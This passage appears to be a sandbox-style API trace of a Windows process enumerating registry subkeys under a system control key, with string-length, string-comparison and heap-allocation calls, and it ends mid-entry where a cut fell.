[0063.469] lstrlenW (lpString="IDConfigDB") returned 10 [0063.469] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e) returned 0x634590 [0063.469] lstrcmpW (lpString1="arbiters", lpString2="idconfig") returned -1 [0063.469] lstrcmpW (lpString1="computer", lpString2="idconfig") returned -1 [0063.469] lstrcmpW (lpString1="critical", lpString2="idconfig") returned -1 [0063.469] lstrcmpW (lpString1="database", lpString2="idconfig") returned -1 [0063.469] lstrcmpW (lpString1="graphics", lpString2="idconfig") returned -1 [0063.469] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x12) returned 0x63b468 [0063.469] lstrcmpW (lpString1="id", lpString2="db") returned 1 [0063.469] lstrcmpW (lpString1="co", lpString2="db") returned -1 [0063.469] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x19, lpName=0x18fd58, cchName=0x104 | out: lpName="Keyboard Layout") returned 0x0 [0063.469] lstrlenW (lpString="Keyboard Layout") returned 15 [0063.469] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e) returned 0x6345b8 [0063.469] lstrcmpW (lpString1="arbiters", lpString2="keyboard") returned -1 [0063.469] lstrcmpW (lpString1="computer", lpString2="keyboard") returned -1 [0063.469] lstrcmpW (lpString1="critical", lpString2="keyboard") returned -1 [0063.469] lstrcmpW (lpString1="database", lpString2="keyboard") returned -1 [0063.469] lstrcmpW (lpString1="graphics", lpString2="keyboard") returned -1 [0063.469] lstrcmpW (lpString1="idconfig", lpString2="keyboard") returned -1 [0063.469] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1a) returned 0x6345e0 [0063.470] lstrcmpW (lpString1="backup", lpString2="layout") returned -1 [0063.470] lstrcmpW (lpString1="device", lpString2="layout") returned -1 [0063.470] lstrcmpW (lpString1="errata", lpString2="layout") returned -1 [0063.470] lstrcmpW (lpString1="system", lpString2="layout") returned 1 [0063.470] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x1a, lpName=0x18fd58, cchName=0x104 | out: lpName="Keyboard Layouts") returned 0x0 [0063.470] lstrlenW (lpString="Keyboard Layouts") returned 16 [0063.470] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e) returned 0x634608 [0063.470] lstrcmpW (lpString1="arbiters", lpString2="keyboard") returned -1 [0063.470] lstrcmpW (lpString1="computer", lpString2="keyboard") returned -1 [0063.470] lstrcmpW (lpString1="critical", lpString2="keyboard") returned -1 [0063.470] lstrcmpW (lpString1="database", lpString2="keyboard") returned -1 [0063.470] lstrcmpW (lpString1="graphics", lpString2="keyboard") returned -1 [0063.470] lstrcmpW (lpString1="idconfig", lpString2="keyboard") returned -1 [0063.470] lstrcmpW (lpString1="keyboard", lpString2="keyboard") returned 0 [0063.470] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x634608 | out: hHeap=0x620000) returned 1 [0063.470] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x634608 [0063.470] lstrcmpW (lpString1="restore", lpString2="layouts") returned 1 [0063.470] lstrcmpW (lpString1="arbiter", lpString2="layouts") returned -1 [0063.470] lstrcmpW (lpString1="content", lpString2="layouts") returned -1 [0063.470] lstrcmpW (lpString1="control", lpString2="layouts") returned -1 [0063.470] lstrcmpW (lpString1="classes", lpString2="layouts") returned -1 [0063.470] lstrcmpW (lpString1="drivers", lpString2="layouts") returned -1 [0063.470] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x1b, lpName=0x18fd58, cchName=0x104 | out: lpName="Lsa") returned 0x0 [0063.470] lstrlenW (lpString="Lsa") returned 3 [0063.470] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x63b488 [0063.470] lstrcmpW (lpString1="agp", lpString2="lsa") returned -1 [0063.470] lstrcmpW (lpString1="app", lpString2="lsa") returned -1 [0063.470] lstrcmpW (lpString1="cmf", lpString2="lsa") returned -1 [0063.470] lstrcmpW (lpString1="com", lpString2="lsa") returned -1 [0063.470] lstrcmpW (lpString1="els", lpString2="lsa") returned -1 [0063.470] lstrcmpW (lpString1="hal", lpString2="lsa") returned -1 [0063.471] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x1c, lpName=0x18fd58, cchName=0x104 | out: lpName="LsaExtensionConfig") returned 0x0 [0063.471] lstrlenW (lpString="LsaExtensionConfig") returned 18 [0063.471] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x63b4a8 [0063.471] lstrcmpW (lpString1="agp", lpString2="lsa") returned -1 [0063.471] lstrcmpW (lpString1="app", lpString2="lsa") returned -1 [0063.471] lstrcmpW (lpString1="cmf", lpString2="lsa") returned -1 [0063.471] lstrcmpW (lpString1="com", lpString2="lsa") returned -1 [0063.471] lstrcmpW (lpString1="els", lpString2="lsa") returned -1 [0063.471] lstrcmpW (lpString1="hal", lpString2="lsa") returned -1 [0063.471] lstrcmpW (lpString1="lsa", lpString2="lsa") returned 0 [0063.471] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.471] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x634630 [0063.471] lstrcmpW (lpString1="overrides", lpString2="extension") returned 1 [0063.471] lstrcmpW (lpString1="utilities", lpString2="extension") returned 1 [0063.471] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1a) returned 0x634658 [0063.471] lstrcmpW (lpString1="backup", lpString2="config") returned -1 [0063.471] lstrcmpW (lpString1="device", lpString2="config") returned 1 [0063.471] lstrcmpW (lpString1="errata", lpString2="config") returned 1 [0063.471] lstrcmpW (lpString1="system", lpString2="config") returned 1 [0063.471] lstrcmpW (lpString1="layout", lpString2="config") returned 1 [0063.471] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x1d, lpName=0x18fd58, cchName=0x104 | out: lpName="LsaInformation") returned 0x0 [0063.471] lstrlenW (lpString="LsaInformation") returned 14 [0063.471] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x63b4a8 [0063.471] lstrcmpW (lpString1="agp", lpString2="lsa") returned -1 [0063.471] lstrcmpW (lpString1="app", lpString2="lsa") returned -1 [0063.471] lstrcmpW (lpString1="cmf", lpString2="lsa") returned -1 [0063.471] lstrcmpW (lpString1="com", lpString2="lsa") returned -1 [0063.471] lstrcmpW (lpString1="els", lpString2="lsa") returned -1 [0063.471] lstrcmpW (lpString1="hal", lpString2="lsa") returned -1 [0063.471] lstrcmpW (lpString1="lsa", lpString2="lsa") returned 0 [0063.471] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.471] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x63bbb0 [0063.472] lstrcmpW (lpString1="diagnostics", lpString2="information") returned -1 [0063.472] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x1e, lpName=0x18fd58, cchName=0x104 | out: lpName="MediaCategories") returned 0x0 [0063.472] lstrlenW (lpString="MediaCategories") returned 15 [0063.472] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x63b4a8 [0063.472] lstrcmpW (lpString1="class", lpString2="media") returned -1 [0063.472] lstrcmpW (lpString1="index", lpString2="media") returned -1 [0063.472] lstrcmpW (lpString1="crash", lpString2="media") returned -1 [0063.472] lstrcmpW (lpString1="group", lpString2="media") returned -1 [0063.472] lstrcmpW (lpString1="order", lpString2="media") returned 1 [0063.472] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x22) returned 0x63bbe0 [0063.472] lstrcmpW (lpString1="installers", lpString2="categories") returned 1 [0063.472] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x1f, lpName=0x18fd58, cchName=0x104 | out: lpName="MediaDRM") returned 0x0 [0063.472] lstrlenW (lpString="MediaDRM") returned 8 [0063.472] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x63b4c8 [0063.472] lstrcmpW (lpString1="class", lpString2="media") returned -1 [0063.472] lstrcmpW (lpString1="index", lpString2="media") returned -1 [0063.472] lstrcmpW (lpString1="crash", lpString2="media") returned -1 [0063.472] lstrcmpW (lpString1="group", lpString2="media") returned -1 [0063.472] lstrcmpW (lpString1="order", lpString2="media") returned 1 [0063.472] lstrcmpW (lpString1="media", lpString2="media") returned 0 [0063.472] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4c8 | out: hHeap=0x620000) returned 1 [0063.472] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x63b4c8 [0063.472] lstrcmpW (lpString1="agp", lpString2="drm") returned -1 [0063.472] lstrcmpW (lpString1="app", lpString2="drm") returned -1 [0063.472] lstrcmpW (lpString1="cmf", lpString2="drm") returned -1 [0063.472] lstrcmpW (lpString1="com", lpString2="drm") returned -1 [0063.472] lstrcmpW (lpString1="els", lpString2="drm") returned 1 [0063.472] lstrcmpW (lpString1="hal", lpString2="drm") returned 1 [0063.472] lstrcmpW (lpString1="lsa", lpString2="drm") returned 1 [0063.473] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x20, lpName=0x18fd58, cchName=0x104 | out: lpName="MediaInterfaces") returned 0x0 [0063.473] lstrlenW (lpString="MediaInterfaces") returned 15 [0063.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x63b4e8 [0063.473] lstrcmpW (lpString1="class", lpString2="media") returned -1 [0063.473] lstrcmpW (lpString1="index", lpString2="media") returned -1 [0063.473] lstrcmpW (lpString1="crash", lpString2="media") returned -1 [0063.473] lstrcmpW (lpString1="group", lpString2="media") returned -1 [0063.473] lstrcmpW (lpString1="order", lpString2="media") returned 1 [0063.473] lstrcmpW (lpString1="media", lpString2="media") returned 0 [0063.473] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4e8 | out: hHeap=0x620000) returned 1 [0063.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x22) returned 0x63bc10 [0063.473] lstrcmpW (lpString1="installers", lpString2="interfaces") returned -1 [0063.473] lstrcmpW (lpString1="categories", lpString2="interfaces") returned -1 [0063.473] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x21, lpName=0x18fd58, cchName=0x104 | out: lpName="MediaProperties") returned 0x0 [0063.473] lstrlenW (lpString="MediaProperties") returned 15 [0063.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x63b4e8 [0063.473] lstrcmpW (lpString1="class", lpString2="media") returned -1 [0063.473] lstrcmpW (lpString1="index", lpString2="media") returned -1 [0063.473] lstrcmpW (lpString1="crash", lpString2="media") returned -1 [0063.473] lstrcmpW (lpString1="group", lpString2="media") returned -1 [0063.473] lstrcmpW (lpString1="order", lpString2="media") returned 1 [0063.473] lstrcmpW (lpString1="media", lpString2="media") returned 0 [0063.473] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4e8 | out: hHeap=0x620000) returned 1 [0063.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x22) returned 0x63bc40 [0063.474] lstrcmpW (lpString1="installers", lpString2="properties") returned -1 [0063.474] lstrcmpW (lpString1="categories", lpString2="properties") returned -1 [0063.474] lstrcmpW (lpString1="interfaces", lpString2="properties") returned -1 [0063.474] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x22, lpName=0x18fd58, cchName=0x104 | out: lpName="MediaTypes") returned 0x0 [0063.474] lstrlenW (lpString="MediaTypes") returned 10 [0063.474] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x63b4e8 [0063.474] lstrcmpW (lpString1="class", lpString2="media") returned -1 [0063.474] lstrcmpW (lpString1="index", lpString2="media") returned -1 [0063.474] lstrcmpW (lpString1="crash", lpString2="media") returned -1 [0063.474] lstrcmpW (lpString1="group", lpString2="media") returned -1 [0063.474] lstrcmpW (lpString1="order", lpString2="media") returned 1 [0063.474] lstrcmpW (lpString1="media", lpString2="media") returned 0 [0063.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4e8 | out: hHeap=0x620000) returned 1 [0063.474] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x63b4e8 [0063.474] lstrcmpW (lpString1="class", lpString2="types") returned -1 [0063.474] lstrcmpW (lpString1="index", lpString2="types") returned -1 [0063.474] lstrcmpW (lpString1="crash", lpString2="types") returned -1 [0063.474] lstrcmpW (lpString1="group", lpString2="types") returned -1 [0063.474] lstrcmpW (lpString1="order", lpString2="types") returned -1 [0063.474] lstrcmpW (lpString1="media", lpString2="types") returned -1 [0063.474] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x23, lpName=0x18fd58, cchName=0x104 | out: lpName="MobilePC") returned 0x0 [0063.474] lstrlenW (lpString="MobilePC") returned 8 [0063.474] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1a) returned 0x63bc88 [0063.475] lstrcmpW (lpString1="backup", lpString2="mobile") returned -1 [0063.475] lstrcmpW (lpString1="device", lpString2="mobile") returned -1 [0063.475] lstrcmpW (lpString1="errata", lpString2="mobile") returned -1 [0063.475] lstrcmpW (lpString1="system", lpString2="mobile") returned 1 [0063.475] lstrcmpW (lpString1="layout", lpString2="mobile") returned -1 [0063.475] lstrcmpW (lpString1="config", lpString2="mobile") returned -1 [0063.475] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x12) returned 0x63b508 [0063.475] lstrcmpW (lpString1="id", lpString2="pc") returned -1 [0063.475] lstrcmpW (lpString1="co", lpString2="pc") returned -1 [0063.475] lstrcmpW (lpString1="db", lpString2="pc") returned -1 [0063.475] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x24, lpName=0x18fd58, cchName=0x104 | out: lpName="MPDEV") returned 0x0 [0063.475] lstrlenW (lpString="MPDEV") returned 5 [0063.475] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x63b528 [0063.476] lstrcmpW (lpString1="class", lpString2="mpdev") returned -1 [0063.476] lstrcmpW (lpString1="index", lpString2="mpdev") returned -1 [0063.476] lstrcmpW (lpString1="crash", lpString2="mpdev") returned -1 [0063.476] lstrcmpW (lpString1="group", lpString2="mpdev") returned -1 [0063.476] lstrcmpW (lpString1="order", lpString2="mpdev") returned 1 [0063.476] lstrcmpW (lpString1="media", lpString2="mpdev") returned -1 [0063.476] lstrcmpW (lpString1="types", lpString2="mpdev") returned 1 [0063.476] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x25, lpName=0x18fd58, cchName=0x104 | out: lpName="MSDTC") returned 0x0 [0063.476] lstrlenW (lpString="MSDTC") returned 5 [0063.476] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x63b548 [0063.476] lstrcmpW (lpString1="class", lpString2="msdtc") returned -1 [0063.476] lstrcmpW (lpString1="index", lpString2="msdtc") returned -1 [0063.476] lstrcmpW (lpString1="crash", lpString2="msdtc") returned -1 [0063.476] lstrcmpW (lpString1="group", lpString2="msdtc") returned -1 [0063.476] lstrcmpW (lpString1="order", lpString2="msdtc") returned 1 [0063.476] lstrcmpW (lpString1="media", lpString2="msdtc") returned -1 [0063.476] lstrcmpW (lpString1="types", lpString2="msdtc") returned 1 [0063.476] lstrcmpW (lpString1="mpdev", lpString2="msdtc") returned -1 [0063.476] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x26, lpName=0x18fd58, cchName=0x104 | out: lpName="MUI") returned 0x0 [0063.476] lstrlenW (lpString="MUI") returned 3 [0063.476] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x63b568 [0063.476] lstrcmpW (lpString1="agp", lpString2="mui") returned -1 [0063.476] lstrcmpW (lpString1="app", lpString2="mui") returned -1 [0063.476] lstrcmpW (lpString1="cmf", lpString2="mui") returned -1 [0063.476] lstrcmpW (lpString1="com", lpString2="mui") returned -1 [0063.477] lstrcmpW (lpString1="els", lpString2="mui") returned -1 [0063.477] lstrcmpW (lpString1="hal", lpString2="mui") returned -1 [0063.477] lstrcmpW (lpString1="lsa", lpString2="mui") returned -1 [0063.477] lstrcmpW (lpString1="drm", lpString2="mui") returned -1 [0063.477] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x27, lpName=0x18fd58, cchName=0x104 | out: lpName="NetDiagFx") returned 0x0 [0063.477] lstrlenW (lpString="NetDiagFx") returned 9 [0063.477] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x63b588 [0063.477] lstrcmpW (lpString1="agp", lpString2="net") returned -1 [0063.477] lstrcmpW (lpString1="app", lpString2="net") returned -1 [0063.477] lstrcmpW (lpString1="cmf", lpString2="net") returned -1 [0063.477] lstrcmpW (lpString1="com", lpString2="net") returned -1 [0063.477] lstrcmpW (lpString1="els", lpString2="net") returned -1 [0063.477] lstrcmpW (lpString1="hal", lpString2="net") returned -1 [0063.477] lstrcmpW (lpString1="lsa", lpString2="net") returned -1 [0063.477] lstrcmpW (lpString1="drm", lpString2="net") returned -1 [0063.477] lstrcmpW (lpString1="mui", lpString2="net") returned -1 [0063.477] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x16) returned 0x63b5a8 [0063.477] lstrcmpW (lpString1="acpi", lpString2="diag") returned -1 [0063.477] lstrcmpW (lpString1="name", lpString2="diag") returned 1 [0063.477] lstrcmpW (lpString1="file", lpString2="diag") returned 1 [0063.477] lstrcmpW (lpString1="list", lpString2="diag") returned 1 [0063.477] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x12) returned 0x63b5c8 [0063.477] lstrcmpW (lpString1="id", lpString2="fx") returned 1 [0063.477] lstrcmpW (lpString1="co", lpString2="fx") returned -1 [0063.477] lstrcmpW (lpString1="db", lpString2="fx") returned -1 [0063.478] lstrcmpW (lpString1="pc", lpString2="fx") returned 1 [0063.478] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x28, lpName=0x18fd58, cchName=0x104 | out: lpName="NetTrace") returned 0x0 [0063.478] lstrlenW (lpString="NetTrace") returned 8 [0063.478] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x63b5e8 [0063.478] lstrcmpW (lpString1="agp", lpString2="net") returned -1 [0063.478] lstrcmpW (lpString1="app", lpString2="net") returned -1 [0063.478] lstrcmpW (lpString1="cmf", lpString2="net") returned -1 [0063.478] lstrcmpW (lpString1="com", lpString2="net") returned -1 [0063.478] lstrcmpW (lpString1="els", lpString2="net") returned -1 [0063.478] lstrcmpW (lpString1="hal", lpString2="net") returned -1 [0063.478] lstrcmpW (lpString1="lsa", lpString2="net") returned -1 [0063.478] lstrcmpW (lpString1="drm", lpString2="net") returned -1 [0063.478] lstrcmpW (lpString1="mui", lpString2="net") returned -1 [0063.478] lstrcmpW (lpString1="net", lpString2="net") returned 0 [0063.478] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b5e8 | out: hHeap=0x620000) returned 1 [0063.478] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x63b5e8 [0063.478] lstrcmpW (lpString1="class", lpString2="trace") returned -1 [0063.478] lstrcmpW (lpString1="index", lpString2="trace") returned -1 [0063.478] lstrcmpW (lpString1="crash", lpString2="trace") returned -1 [0063.478] lstrcmpW (lpString1="group", lpString2="trace") returned -1 [0063.478] lstrcmpW (lpString1="order", lpString2="trace") returned -1 [0063.479] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x29, lpName=0x18fd58, cchName=0x104 | out: lpName="Network") returned 0x0 [0063.479] lstrlenW (lpString="Network") returned 7 [0063.479] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x63bcb0 [0063.479] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x2a, lpName=0x18fd58, cchName=0x104 | out: lpName="NetworkProvider") returned 0x0 [0063.479] lstrlenW (lpString="NetworkProvider") returned 15 [0063.479] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x63bcd8 [0063.479] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x2b, lpName=0x18fd58, cchName=0x104 | out: lpName="Nls") returned 0x0 [0063.479] lstrlenW (lpString="Nls") returned 3 [0063.479] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x63b608 [0063.479] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x2c, lpName=0x18fd58, cchName=0x104 | out: lpName="NodeInterfaces") returned 0x0 [0063.479] lstrlenW (lpString="NodeInterfaces") returned 14 [0063.479] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x16) returned 0x63b628 [0063.479] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x2d, lpName=0x18fd58, cchName=0x104 | out: lpName="Nsi") returned 0x0 [0063.479] lstrlenW (lpString="Nsi") returned 3 [0063.479] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x63b648 [0063.479] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x2e, lpName=0x18fd58, cchName=0x104 | out: lpName="PCW") returned 0x0 [0063.480] lstrlenW (lpString="PCW") returned 3 [0063.480] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x63b668 [0063.480] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x2f, lpName=0x18fd58, cchName=0x104 | out: lpName="PnP") returned 0x0 [0063.480] lstrlenW (lpString="PnP") returned 3 [0063.480] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x12) returned 0x63b688 [0063.480] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x30, lpName=0x18fd58, cchName=0x104 | out: lpName="Power") returned 0x0 [0063.480] lstrlenW (lpString="Power") returned 5 [0063.480] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x63b6a8 [0063.480] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x31, lpName=0x18fd58, cchName=0x104 | out: lpName="Print") returned 0x0 [0063.480] lstrlenW (lpString="Print") returned 5 [0063.480] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x63b6c8 [0063.480] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x32, lpName=0x18fd58, cchName=0x104 | out: lpName="PriorityControl") returned 0x0 [0063.480] lstrlenW (lpString="PriorityControl") returned 15 [0063.480] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e) returned 0x63bd00 [0063.480] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x33, lpName=0x18fd58, cchName=0x104 | out: lpName="ProductOptions") returned 0x0 [0063.480] lstrlenW (lpString="ProductOptions") returned 14 [0063.480] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x63bd28 [0063.480] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x34, lpName=0x18fd58, cchName=0x104 | out: lpName="Remote Assistance") returned 0x0 [0063.481] lstrlenW (lpString="Remote Assistance") returned 17 [0063.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1a) returned 0x63bd78 [0063.481] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x35, lpName=0x18fd58, cchName=0x104 | out: lpName="SafeBoot") returned 0x0 [0063.481] lstrlenW (lpString="SafeBoot") returned 8 [0063.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x16) returned 0x63b6e8 [0063.481] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x36, lpName=0x18fd58, cchName=0x104 | out: lpName="ScsiPort") returned 0x0 [0063.481] lstrlenW (lpString="ScsiPort") returned 8 [0063.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x16) returned 0x63b728 [0063.481] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x37, lpName=0x18fd58, cchName=0x104 | out: lpName="SecurePipeServers") returned 0x0 [0063.481] lstrlenW (lpString="SecurePipeServers") returned 17 [0063.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1a) returned 0x63bda0 [0063.481] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x38, lpName=0x18fd58, cchName=0x104 | out: lpName="SecurityProviders") returned 0x0 [0063.481] lstrlenW (lpString="SecurityProviders") returned 17 [0063.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e) returned 0x63bdf0 [0063.481] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x39, lpName=0x18fd58, cchName=0x104 | out: lpName="ServiceGroupOrder") returned 0x0 [0063.481] lstrlenW (lpString="ServiceGroupOrder") returned 17 [0063.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x63be40 [0063.482] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x3a, lpName=0x18fd58, cchName=0x104 | out: lpName="ServiceProvider") returned 0x0 [0063.482] lstrlenW (lpString="ServiceProvider") returned 15 [0063.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x63be68 [0063.482] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x3b, lpName=0x18fd58, cchName=0x104 | out: lpName="Session Manager") returned 0x0 [0063.482] lstrlenW (lpString="Session Manager") returned 15 [0063.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x63be68 [0063.482] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x3c, lpName=0x18fd58, cchName=0x104 | out: lpName="SNMP") returned 0x0 [0063.482] lstrlenW (lpString="SNMP") returned 4 [0063.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x16) returned 0x63b788 [0063.482] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x3d, lpName=0x18fd58, cchName=0x104 | out: lpName="SQMServiceList") returned 0x0 [0063.482] lstrlenW (lpString="SQMServiceList") returned 14 [0063.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x22) returned 0x63c4a0 [0063.482] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x3e, lpName=0x18fd58, cchName=0x104 | out: lpName="Srp") returned 0x0 [0063.482] lstrlenW (lpString="Srp") returned 3 [0063.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x63b7a8 [0063.482] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x3f, lpName=0x18fd58, cchName=0x104 | out: lpName="SrpExtensionConfig") returned 0x0 [0063.482] lstrlenW (lpString="SrpExtensionConfig") returned 18 [0063.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x63b7c8 [0063.483] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x40, lpName=0x18fd58, cchName=0x104 | out: lpName="StillImage") returned 0x0 [0063.483] lstrlenW (lpString="StillImage") returned 10 [0063.483] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x63b7c8 [0063.483] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x41, lpName=0x18fd58, cchName=0x104 | out: lpName="Storage") returned 0x0 [0063.483] lstrlenW (lpString="Storage") returned 7 [0063.483] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x63beb8 [0063.483] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x42, lpName=0x18fd58, cchName=0x104 | out: lpName="SystemResources") returned 0x0 [0063.483] lstrlenW (lpString="SystemResources") returned 15 [0063.483] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1a) returned 0x63bee0 [0063.483] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x43, lpName=0x18fd58, cchName=0x104 | out: lpName="TabletPC") returned 0x0 [0063.483] lstrlenW (lpString="TabletPC") returned 8 [0063.483] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1a) returned 0x63bf08 [0063.483] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x44, lpName=0x18fd58, cchName=0x104 | out: lpName="Terminal Server") returned 0x0 [0063.483] lstrlenW (lpString="Terminal Server") returned 15 [0063.483] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e) returned 0x63bf30 [0063.483] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x45, lpName=0x18fd58, cchName=0x104 | out: lpName="TimeZoneInformation") returned 0x0 [0063.483] lstrlenW (lpString="TimeZoneInformation") returned 19 [0063.483] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x16) returned 0x63b808 [0063.484] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x46, lpName=0x18fd58, cchName=0x104 | out: lpName="usbflags") returned 0x0 [0063.484] lstrlenW (lpString="usbflags") returned 8 [0063.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e) returned 0x63bf80 [0063.484] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x47, lpName=0x18fd58, cchName=0x104 | out: lpName="usbstor") returned 0x0 [0063.484] lstrlenW (lpString="usbstor") returned 7 [0063.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x63bfa8 [0063.484] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x48, lpName=0x18fd58, cchName=0x104 | out: lpName="VAN") returned 0x0 [0063.484] lstrlenW (lpString="VAN") returned 3 [0063.484] RtlAllocateHeap 